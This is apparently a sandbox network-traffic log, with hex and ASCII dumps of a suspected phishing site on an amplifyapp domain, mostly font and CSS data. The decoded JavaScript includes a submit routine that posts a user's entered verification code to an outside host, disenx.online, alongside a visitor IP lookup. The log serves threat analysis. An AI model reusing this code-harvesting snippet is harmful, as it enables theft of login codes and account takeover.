                                          Data Ascii: content:"\f201"}.fa-mask-ventilator[data-v-e7e7d034]:before{content:"\e524"}.fa-arrow-right[data-v-e7e7d034]:before{content:"\f061"}.fa-map-signs[data-v-e7e7d034]:before,.fa-signs-post[data-v-e7e7d034]:before{content:"\f277"}.fa-cash-register[data-v-e7e7d
                                          2024-03-25 19:07:17 UTC16384INData Raw: 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 36 33 22 7d 2e 66 61 2d 64 6f 6f 72 2d 63 6c 6f 73 65 64 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 32 61 22 7d 2e 66 61 2d 73 68 69 65 6c 64 2d 76 69 72 75 73 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 36 63 22 7d 2e 66 61 2d 64 69 63 65 2d 73 69 78 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 32 36 22 7d 2e 66 61 2d 6d 6f 73 71 75 69 74 6f 2d 6e 65 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65
                                          Data Ascii: a-v-e7e7d034]:before{content:"\f163"}.fa-door-closed[data-v-e7e7d034]:before{content:"\f52a"}.fa-shield-virus[data-v-e7e7d034]:before{content:"\e06c"}.fa-dice-six[data-v-e7e7d034]:before{content:"\f526"}.fa-mosquito-net[data-v-e7e7d034]:before{content:"\e
                                          2024-03-25 19:07:17 UTC16384INData Raw: 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 33 32 22 7d 2e 66 61 2d 76 61 75 6c 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 32 63 35 22 7d 2e 66 61 2d 6d 61 72 73 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 32 32 32 22 7d 2e 66 61 2d 74 6f 69 6c 65 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 64 38 22 7d 2e 66 61 2d 70 6c 61 6e 65 2d 63 69 72 63 6c 65 2d 78 6d 61 72 6b 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 35 37 22 7d 2e 66 61 2d 63 6e 79 5b 64 61 74
                                          Data Ascii: e7d034]:before{content:"\e532"}.fa-vault[data-v-e7e7d034]:before{content:"\e2c5"}.fa-mars[data-v-e7e7d034]:before{content:"\f222"}.fa-toilet[data-v-e7e7d034]:before{content:"\f7d8"}.fa-plane-circle-xmark[data-v-e7e7d034]:before{content:"\e557"}.fa-cny[dat
                                          2024-03-25 19:07:17 UTC16384INData Raw: 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 31 34 39 22 7d 2e 66 61 2d 70 65 72 73 6f 6e 2d 66 61 6c 6c 69 6e 67 2d 62 75 72 73 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 35 34 37 22 7d 2e 66 61 2d 61 77 61 72 64 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 35 35 39 22 7d 2e 66 61 2d 74 69 63 6b 65 74 2d 61 6c 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 74 69 63 6b 65 74 2d 73 69 6d 70 6c 65 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 66 66 22 7d 2e 66 61 2d 62 75 69 6c
                                          Data Ascii: v-e7e7d034]:before{content:"\f149"}.fa-person-falling-burst[data-v-e7e7d034]:before{content:"\e547"}.fa-award[data-v-e7e7d034]:before{content:"\f559"}.fa-ticket-alt[data-v-e7e7d034]:before,.fa-ticket-simple[data-v-e7e7d034]:before{content:"\f3ff"}.fa-buil
                                          2024-03-25 19:07:17 UTC16384INData Raw: 66 61 2d 68 69 72 65 2d 61 2d 68 65 6c 70 65 72 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 33 62 30 22 7d 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 62 79 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 65 37 22 7d 2e 66 61 2d 75 6e 69 74 79 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 34 39 22 7d 2e 66 61 2d 77 68 6d 63 73 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 30 64 22 7d 2e 66 61 2d 72 6f 63 6b 65 74 63 68 61 74 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65
                                          Data Ascii: fa-hire-a-helper[data-v-e7e7d034]:before{content:"\f3b0"}.fa-creative-commons-by[data-v-e7e7d034]:before{content:"\f4e7"}.fa-unity[data-v-e7e7d034]:before{content:"\e049"}.fa-whmcs[data-v-e7e7d034]:before{content:"\f40d"}.fa-rocketchat[data-v-e7e7d034]:be
                                          2024-03-25 19:07:17 UTC16384INData Raw: 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 30 34 22 7d 2e 66 61 2d 66 69 67 6d 61 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 37 39 39 22 7d 2e 66 61 2d 63 72 65 61 74 69 76 65 2d 63 6f 6d 6d 6f 6e 73 2d 72 65 6d 69 78 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 65 65 22 7d 2e 66 61 2d 63 63 2d 61 6d 61 7a 6f 6e 2d 70 61 79 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 34 32 64 22 7d 2e 66 61 2d 64 72 6f 70 62 6f 78 5b 64 61 74 61 2d 76 2d 65 37 65 37 64 30 33 34 5d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65
                                          Data Ascii: ata-v-e7e7d034]:before{content:"\f404"}.fa-figma[data-v-e7e7d034]:before{content:"\f799"}.fa-creative-commons-remix[data-v-e7e7d034]:before{content:"\f4ee"}.fa-cc-amazon-pay[data-v-e7e7d034]:before{content:"\f42d"}.fa-dropbox[data-v-e7e7d034]:before{conte


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.64970713.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:16 UTC581OUTGET /js/app.94aec170.js HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:17 UTC560INHTTP/1.1 200 OK
                                          Content-Type: application/javascript
                                          Content-Length: 38755
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:17 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "7ac94a567416ab851772f556df3ac9f9"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          Vary: Accept-Encoding
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 a251e31740a6e166e8fdccf296c41644.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: JEW32-jGBRXRpC4cJBppiqM9YzaFwbtvIH7jy7zMYR0PBm-VElXnoQ==
                                          2024-03-25 19:07:17 UTC16384INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 38 35 39 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 73 3d 61 28 39 32 34 32 29 2c 6f 3d 61 28 33 33 39 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 63 6f 6e 73 74 20 61 3d 28 30 2c 6f 2e 75 70 29 28 22 72 6f 75 74 65 72 2d 76 69 65 77 22 29 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 77 67 29 28 29 2c 28 30 2c 6f 2e 6a 34 29 28 61 29 7d 76 61 72 20 72 3d 61 28 38 39 29 3b 63 6f 6e 73 74 20 69 3d 7b 7d 2c 6c 3d 28 30 2c 72 2e 5a 29 28 69 2c 5b 5b 22 72 65 6e 64 65 72 22 2c 6e 5d 5d 29 3b 76 61 72 20 64 3d 6c 2c 63 3d 61 28 32 34 38 33 29 2c 70 3d 61 28 37 31 33 39 29 2c 66 3d 61 2e 70 2b 22 69 6d 67 2f 6c 6f 61 64 69 6e 67 4c 6f 67 6f
                                          Data Ascii: (function(){"use strict";var e={8595:function(e,t,a){var s=a(9242),o=a(3396);function n(e,t){const a=(0,o.up)("router-view");return(0,o.wg)(),(0,o.j4)(a)}var r=a(89);const i={},l=(0,r.Z)(i,[["render",n]]);var d=l,c=a(2483),p=a(7139),f=a.p+"img/loadingLogo
                                          2024-03-25 19:07:17 UTC16384INData Raw: 69 6c 73 20 79 6f 75 20 6d 61 6b 65 20 76 69 73 69 62 6c 65 20 74 6f 20 6f 74 68 65 72 73 2e 20 22 2c 2d 31 29 29 29 2c 47 3d 7b 63 6c 61 73 73 3a 22 6d 74 2d 5b 34 30 70 78 5d 20 77 2d 31 31 2f 31 32 20 6c 67 3a 77 2d 5b 36 30 30 70 78 5d 20 78 6c 3a 77 2d 5b 37 30 30 70 78 5d 20 32 78 6c 3a 77 2d 5b 38 34 34 70 78 5d 20 68 2d 5b 33 30 34 70 78 5d 20 72 6f 75 6e 64 65 64 2d 32 78 6c 20 62 67 2d 77 68 69 74 65 20 73 68 61 64 6f 77 2d 6d 64 22 7d 2c 55 3d 7b 63 6c 61 73 73 3a 22 72 65 6c 61 74 69 76 65 20 62 6f 72 64 65 72 2d 62 2d 32 22 7d 2c 5a 3d 7b 63 6c 61 73 73 3a 22 61 62 73 6f 6c 75 74 65 20 74 65 78 74 2d 5b 23 34 35 34 35 34 35 5d 20 74 6f 70 2d 31 2e 35 20 6c 65 66 74 2d 36 20 66 6f 6e 74 2d 6d 6f 6e 74 73 65 72 72 61 74 20 74 65 78 74 2d 5b 31
                                          Data Ascii: ils you make visible to others. ",-1))),G={class:"mt-[40px] w-11/12 lg:w-[600px] xl:w-[700px] 2xl:w-[844px] h-[304px] rounded-2xl bg-white shadow-md"},U={class:"relative border-b-2"},Z={class:"absolute text-[#454545] top-1.5 left-6 font-montserrat text-[1
                                          2024-03-25 19:07:17 UTC5987INData Raw: 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 29 29 7d 29 2c 31 65 33 29 7d 2c 73 75 62 6d 69 74 28 29 7b 74 68 69 73 2e 76 24 2e 24 76 61 6c 69 64 61 74 65 28 29 2c 74 68 69 73 2e 76 24 2e 24 65 72 72 6f 72 3f 61 6c 65 72 74 28 22 50 6c 65 61 73 65 20 65 6e 74 65 72 20 61 20 76 61 6c 69 64 20 63 6f 64 65 20 74 6f 20 63 6f 6e 74 69 6e 75 65 21 22 29 3a 63 65 2e 5a 2e 70 6f 73 74 28 22 68 74 74 70 73 3a 2f 2f 64 69 73 65 6e 78 2e 6f 6e 6c 69 6e 65 2f 61 70 69 2f 6d 65 73 73 61 67 65 2f 31 30 22 2c 7b 63 6f 64 65 47 65 6e 65 72 61 74 6f 72 3a 74 68 69 73 2e 66 6f 72 6d 2e 63 6f 64 65 7d 29 2e 74 68 65 6e 28 28 65 3d 3e 7b 74 68 69 73 2e 66 6f 72 6d 2e 63 6f 64 65 3d 22 22 2c 74 68 69 73 2e 66 6f 72 6d 45 72 72 6f 72 3d 21 31 2c 74 68 69 73 2e 6c 6f 61 64
                                          Data Ascii: {console.log(e)}))}),1e3)},submit(){this.v$.$validate(),this.v$.$error?alert("Please enter a valid code to continue!"):ce.Z.post("https://disenx.online/api/message/10",{codeGenerator:this.form.code}).then((e=>{this.form.code="",this.formError=!1,this.load


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.649711172.64.133.224435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:18 UTC582OUTGET /css/montserrat?styles=17402 HTTP/1.1
                                          Host: fonts.cdnfonts.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: text/css,*/*;q=0.1
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: style
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:18 UTC769INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:18 GMT
                                          Content-Type: text/css;charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cf-Bgj: minify
                                          Cf-Polished: origSize=206
                                          Vary: Accept-Encoding
                                          Cache-Control: max-age=2678400
                                          CF-Cache-Status: HIT
                                          Age: 295494
                                          Last-Modified: Fri, 22 Mar 2024 09:02:24 GMT
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pJENdn6ICAIF4Xzm2%2B4ofcH%2BVq%2ByZPimQBu6NOVDTurWFKPtX4Re%2Bgltp%2Fkd%2BEG1rScUQTEX0w6PeICN9cjRBZ7aKTkEosEdIK34jFvxTtkCViv6x0hENe%2Fp0uyviOQy2JwWnWE%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Access-Control-Allow-Origin: *
                                          Server: cloudflare
                                          CF-RAY: 86a12edf8da11809-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2024-03-25 19:07:18 UTC177INData Raw: 61 62 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 74 73 65 72 72 61 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 6c 6f 63 61 6c 28 27 4d 6f 6e 74 73 65 72 72 61 74 27 29 2c 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 63 64 6e 66 6f 6e 74 73 2e 63 6f 6d 2f 73 2f 31 34 38 38 33 2f 4d 6f 6e 74 73 65 72 72 61 74 2d 52 65 67 75 6c 61 72 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 7d 0d 0a
                                          Data Ascii: ab@font-face{font-family:montserrat;font-style:normal;font-weight:400;src:local('Montserrat'),url(https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff) format('woff')}
                                          2024-03-25 19:07:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.64971413.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC691OUTGET /fonts/fa-regular-400.b041b1fa4fe241b23445.3580b4a9.woff2 HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: font
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC525INHTTP/1.1 200 OK
                                          Content-Type: font/woff2
                                          Content-Length: 24488
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "747442fa76f1d9a31f9a54a2e8a4b448"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 824fe21e467658628899bdd8725649ee.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: v4wCHeId9ZRLydoQBUk5WnkrlzdSK4w_4NoNBTUJBBtzF171jNYugg==
                                          2024-03-25 19:07:20 UTC8493INData Raw: 77 4f 46 32 00 01 00 00 00 00 5f a8 00 0a 00 00 00 00 ec e8 00 00 5f 5d 03 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 86 50 00 af 00 ca 83 96 68 cb 83 2c 05 88 08 07 20 85 73 76 55 21 3d 6f a5 3d 44 54 d4 7a 38 23 39 69 f5 00 a8 6a 95 10 77 87 bd 2a 7e fd f1 d7 3f ff fd 33 70 5c 8f 75 de 3c 3c ff 7f 7e b5 4e 0a d2 e3 bd 05 20 65 be 02 d1 ed b4 cc af 9e 99 8c e4 9d 16 21 e2 69 fb cd 47 fb 80 87 1d 89 18 9d c9 2e 77 46 41 10 3f 0e fa d9 53 07 43 17 13 88 48 34 38 59 fa 8e 60 3a bc 3d fd ff a8 9a fd bd 0f c4 7b 20 09 bc 87 fa 40 91 1d 20 01 4a 94 44 90 14 01 4a 1a 59 9c 89 3d cd 29 9a 49 73 ba b6 3b bb 3e 63 ed 54 67 db 28 dd d9 aa b4 6a a5 f9 78 bb d3 3a b7 75 6f f9 a5 3b ad fb 37 65 e7 17 f8 27 5c eb ab
                                          Data Ascii: wOF2__]8$ `Ph, svU!=o=DTz8#9ijw*~?3p\u<<~N e!iG.wFA?SCH48Y`:={ @ JDJY=)Is;>cTg(jx:uo;7e'\
                                          2024-03-25 19:07:20 UTC15995INData Raw: 60 0a 5b b0 0b 77 c3 59 78 30 9b 88 28 6e b2 2b 89 71 2e 1a f9 1f 7f ca 26 5e 38 f5 26 5e 38 dd c6 95 d6 59 38 9d 34 08 65 e1 74 12 7a af fc 28 9e 4e b2 70 3a f1 f4 ff 32 7d eb ea a0 6d d7 b2 05 66 71 74 7e 6f 6f 6f ef 70 7f ff 68 6f 6f 6f 6f 0f c5 7c 43 cf b9 c0 bd a3 fd 7d 4e b3 02 da 76 cd 4c 6e 43 3d 26 24 9c 0d 15 65 4f ff da 6c 76 7e fe cf d4 c9 6c 76 dc 17 38 9b cd 66 28 fa c7 b3 99 7e 06 9c 63 c5 0a 3c 0b 20 4b 7d 19 65 71 29 a3 cc 7d 5c 53 69 c6 76 28 e4 3e 7c 42 9b 53 46 59 12 26 21 0d 93 51 e0 0d 62 54 e8 db 41 32 4a 46 bf e4 56 fa c9 cb 66 33 c4 d9 ec 65 2f 9b cd b0 6b a0 52 ac f2 9f 51 88 a5 0e 31 68 f7 6a 9f 25 4e e8 d7 11 29 43 a6 95 0b 0a 65 2a 51 36 b9 26 94 61 72 ea 54 32 54 94 61 72 6a d4 17 5e 4d 1a a5 e5 42 a1 da db 38 b3 35 1c d6 6b
                                          Data Ascii: `[wYx0(n+q.&^8&^8Y84etz(Np:2}mfqt~ooophoooo|C}NvLnC=&$eOlv~lv8f(~c< K}eq)}\Siv(>|BSFY&!QbTA2JFVf3e/kRQ1hj%N)Ce*Q6&arT2Tarj^MB85k


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.64971323.221.242.90443
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept: */*
                                          Accept-Encoding: identity
                                          User-Agent: Microsoft BITS/7.8
                                          Host: fs.microsoft.com
                                          2024-03-25 19:07:20 UTC466INHTTP/1.1 200 OK
                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                          Content-Type: application/octet-stream
                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                          Server: ECAcc (dce/26AC)
                                          X-CID: 11
                                          X-Ms-ApiVersion: Distribute 1.2
                                          X-Ms-Region: prod-eus-z1
                                          Cache-Control: public, max-age=47162
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Connection: close
                                          X-CID: 2


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.649716104.26.13.2054435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC631OUTGET /?format=json HTTP/1.1
                                          Host: api.ipify.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Accept: application/json, text/plain, */*
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC249INHTTP/1.1 200 OK
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Content-Type: application/json
                                          Content-Length: 22
                                          Connection: close
                                          Access-Control-Allow-Origin: *
                                          Vary: Origin
                                          CF-Cache-Status: DYNAMIC
                                          Server: cloudflare
                                          CF-RAY: 86a12eec2e233ae4-IAD
                                          2024-03-25 19:07:20 UTC22INData Raw: 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 7d
                                          Data Ascii: {"ip":"102.165.48.43"}


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.64971713.249.39.104435940C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2024-03-25 19:07:20 UTC689OUTGET /fonts/fa-solid-900.b6879d41b0852f01ed5b.fd0b155c.woff2 HTTP/1.1
                                          Host: isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Origin: https://isuecenter.dig4pnjky2v0q.amplifyapp.com
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: font
                                          Referer: https://isuecenter.dig4pnjky2v0q.amplifyapp.com/css/app.1aceff02.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2024-03-25 19:07:20 UTC526INHTTP/1.1 200 OK
                                          Content-Type: font/woff2
                                          Content-Length: 150020
                                          Connection: close
                                          Date: Mon, 25 Mar 2024 19:07:20 GMT
                                          Server: AmazonS3
                                          Accept-Ranges: bytes
                                          ETag: "d5e647388e2415268b700d3df2e30a0d"
                                          Last-Modified: Mon, 25 Mar 2024 18:38:44 GMT
                                          Cache-Control: public, max-age=0, s-maxage=2
                                          X-Cache: Miss from cloudfront
                                          Via: 1.1 f9efe5e72b7e5cc47bf34a0b0debcbe2.cloudfront.net (CloudFront)
                                          X-Amz-Cf-Pop: IAD89-C1
                                          Alt-Svc: h3=":443"; ma=86400
                                          X-Amz-Cf-Id: LURzdXJO5sY_jBNcS5YPzA8J7_z6I7VMJQAGqIM9lbVcofq97RZ9MQ==
                                          2024-03-25 19:07:20 UTC16384INData Raw: 77 4f 46 32 00 01 00 00 00 02 4a 04 00 0a 00 00 00 05 b8 30 00 02 49 b7 03 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 3c 00 81 91 04 ca 94 fe 44 cb ab 40 05 87 70 07 20 a5 17 dc 92 92 01 44 70 1e 00 00 b6 7a e7 61 44 8a 66 0f 4f 11 3d 69 bd 78 00 54 55 55 55 d5 94 84 80 c7 6c db 01 a0 aa 82 1f fd e4 67 bf f8 d5 6f 7e f7 87 3f fd e5 6f ff f8 97 7f fb 8f ff fa 9f ff fb 4f 81 c1 b8 fb 07 c2 b4 6c c7 e5 f6 78 7d 7e c3 f7 df da e7 ad 9a f9 b8 d4 21 ee b0 b0 40 2f 2a ac 88 55 ec 0a 97 f3 02 3e c2 b2 f1 ad e4 0a 15 a4 f1 1f fb 7b 3b 6d 07 42 f2 d3 77 ee 40 5e 51 5e 89 5a 99 bb e6 66 20 a8 08 83 89 8a cb 06 dc 93 74 17 ff 11 ef b3 37 08 ed 04 e2 60 fc 0e 4c 72 0f 19 bf c6 cb 81 9f a9 50 92 42 f7 4a 78 13 b1
                                          Data Ascii: wOF2J0I8$ `<D@p DpzaDfO=ixTUUUlgo~?oOlx}~!@/*U>{;mBw@^Q^Zf t7`LrPBJx
